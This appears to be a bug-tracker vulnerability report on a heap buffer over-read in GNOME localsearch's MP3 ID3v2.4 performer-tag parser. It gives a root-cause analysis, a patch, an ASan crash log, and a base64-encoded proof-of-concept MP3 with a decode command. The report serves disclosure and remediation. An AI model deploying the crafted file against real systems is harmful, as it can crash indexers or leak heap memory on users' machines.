Bug 2435980 (CVE-2026-1764)

Vulnerability Report: Heap Buffer Overflow in GNOME localsearch MP3 Extractor
Project: https://gitlab.gnome.org/GNOME/localsearch
Component: tracker-extract-mp3
Vulnerability Type: Heap Buffer Overflow (Read)

Description
A secondary heap buffer overflow vulnerability exists in the extract_performers_tags function of src/extractor/tracker-extract-mp3.c. When parsing ID3v2.4 tags, a missing bounds check allows the loop to advance pos + offset beyond the buffer size (csize). This causes the remaining length calculation to underflow, effectively passing a negative value (interpreted as -1) to g_convert. This triggers g_convert to treat the input as a null-terminated string, leading to a read out-of-bounds in strlen as it searches for a null byte in heap memory.

Root Cause Analysis
The vulnerability occurs in the loop that parses performer tags:

// src/extractor/tracker-extract-mp3.c
while (pos + offset < csize) {
    // ...
    text_instrument = &data[pos];
    text_instrument_len = id3v2_strlen (..., csize - 1); // Issue 1: incorrect max len
    offset = text_instrument_len + id3v2_nul_size (text_encode);
    
    // VULNERABILITY: No check if (pos + offset) >= csize
    text_performer = &data[pos + offset];

    // Underflow happens here:
    // If (pos + offset) > csize, then (csize - pos - offset) wraps around to a huge value.
    // When cast to gssize (signed), this huge value can be interpreted as -1.
    if (version == 2.4f) {
        performer = id3v24_text_to_utf8 (text_encode, text_performer, csize - pos - offset, info);
    }
    // ...
}


When csize - pos - offset underflows and results in -1 (or is treated as such by g_convert internal logic), g_convert calling strlen will read until it crashes or finds a null byte, causing a Denial of Service or Information Disclosure.

Impact


Denial of Service: The strlen function reads unmapped memory, causing a SIGSEGV.

Information Disclosure: Similar to the primary vulnerability, this could read visible heap data if a null byte is found far away.


Remediation
Add an explicit bounds check inside the loop to ensure pos + offset does not exceed csize before accessing data or calculating remaining length.

  		offset = text_instrument_len + id3v2_nul_size (text_encode);
+
+		if (pos + offset >= csize) {
+			break;
+		}
+
  		text_performer = &data[pos + offset];



PoC File (Base64)
You can recreate the crash file by decoding this base64 string.
MD5 Checksum: 22ff0943d674fd14f72b34a9b32191b5

base64 -d <<EOF > reproduction.mp3
SUQzBAAAAAASS1RJVDIAAAAGAAADdGl0bGVUTUNMAAAAB/86VA4/SUVudGVydGFpbm1lbnQgRmlubGFuZCBPeQBBUElDAAMQNwAAAGltYWdlL2pwZWcAAwD/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMABgQFBgUEBgYFBgcHBggKEAoKCQkKFA4PDBAXFBgYFxQWFhodJR8aGyMcFhYII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAA4f8AAAAAAQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQAAQAAAaQAAAAgAAA0gAAABFVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVX/+xRk4Y/wAABpAAAACAAADSAAAAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVUxBTUUzLjEwMFVVVVVVVVVVVVVVVVVV//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9VVVVVVVVVVf/7FGThj/AAAGkAAAAIADSAAAAEVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVEFHdGl0bGUAAAAABSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD6pooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKC2PJCiqOs6Xb6xYtaXbTrExDEwTNE3Bz95SDXzh8X/ALR4b8YfYNI1LU4bX7NHJta9lb5iWyclvYVlVqOnrbQ9TLMuWYVPZKdpb7aW+/8AQ+naK+LP7f1n/oL6l/4DTXVzaWNCcmFpbnogUmVsZWFzZSBHcm91cCBJZAA1NjEyMzQAVFhYWAAAACUAAANNdXNpY0JyYWlueiBSZWwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZWFzZSBUcmFka0kAIGMxMjM0NTYAVENPUCsAAC4AAAMoUCkgMjAwOCBTb255IE11c2ljIEVudGVydGFpbm1lbnQgRmlubGFuZCBPeQBBUElDAAMQNwAAAGltYWdlL2pwZWcAAwD/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMABgQFBgUEBgYFBgcHBggKEAoKCQkKFA4PDBAXFBgYFxQWFhodJR8aGyMcFhYgLCAjJicpKikZHy0wLSgwJSgpKP/bAEMBBwcHCggKEwoKEygaFhooKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKP/AABEIAeAB4AMBIgAAEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAVUQ09OCgv/xAC1EABVVVVVVVVVTEFNRTQuMTAwVVVVVVVVVVVVVVVVVVVVVVVVVVVVVf9kFPCP4QAA+2kAAAAIAAAADQEAACAAAaQAAAAgAAAzgAAABFVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVTEFNRTMuMTAwVVVVVVVVVVVVVVVVVVVVVVVVVVVVVf/7FGThj/AAAGkAAAAIAAANIAAAAQAAAaQAAAAgAAA0gAAABFVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVTEFNRTMuMTAwVVVVVVVVVVVVVVVVVVVVVVVVVVVVVf/7FBcUGBgXFBYWGh0lHxobIxwWFiAsIComJykqKRkfLTAtKDAlKCko/9sAQwEHBwcKCAoT////////////////////////////////////////////////oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQFk4Y/wAABpAgAACAAADSAAAAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVUxBTUUzLjEwMFVVVVVVVVVVVVVVVVVVVVVVVVVVVVX/+xRk4Y/wAABpAAAACAAADSAAAAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVUxBTUUzLjEwMFVVVVVVVVVVVVVVVVVV//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9VVVVVVVVVVf/7FGThj/AAAGkAAAAIADSAAAAEVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVEFHdGl0bGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYXJ0aXN0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWxidW0AAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAMjAyNGNvbW1lbnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQk=
EOF



Crash Log

➜  localsearch git:(main) ✗ ASAN_OPTIONS=detect_odr_violation=0 ./build/src/extractor/localsearch-extractor-3 --file crash-9f27a785fa8a60e9a563634aff924ed6ba00101b

(process:1776601): Tracker-WARNING **: 20:04:28.002: No seccomp support compiled-in.
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1776601==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x609479fed286 bp 0x7ffddb7fe520 sp 0x7ffddb7fe370 T0)
==1776601==The signal is caused by a READ memory access.
==1776601==Hint: address points to the zero page.
    #0 0x609479fed286 in run_standalone ../src/extractor/tracker-main.c:269
    #1 0x609479fedaa7 in do_main ../src/extractor/tracker-main.c:370
    #2 0x609479fee475 in main ../src/extractor/tracker-main.c:469
    #3 0x787477e2a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #4 0x787477e2a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #5 0x609479fde684 in _start (/tmp/localsearch/build/src/extractor/localsearch-extractor-3+0x12684) (BuildId: f9112407d77014a3cdb422851c1f4cce6c2b9852)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ../src/extractor/tracker-main.c:269 in run_standalone
==1776601==ABORTING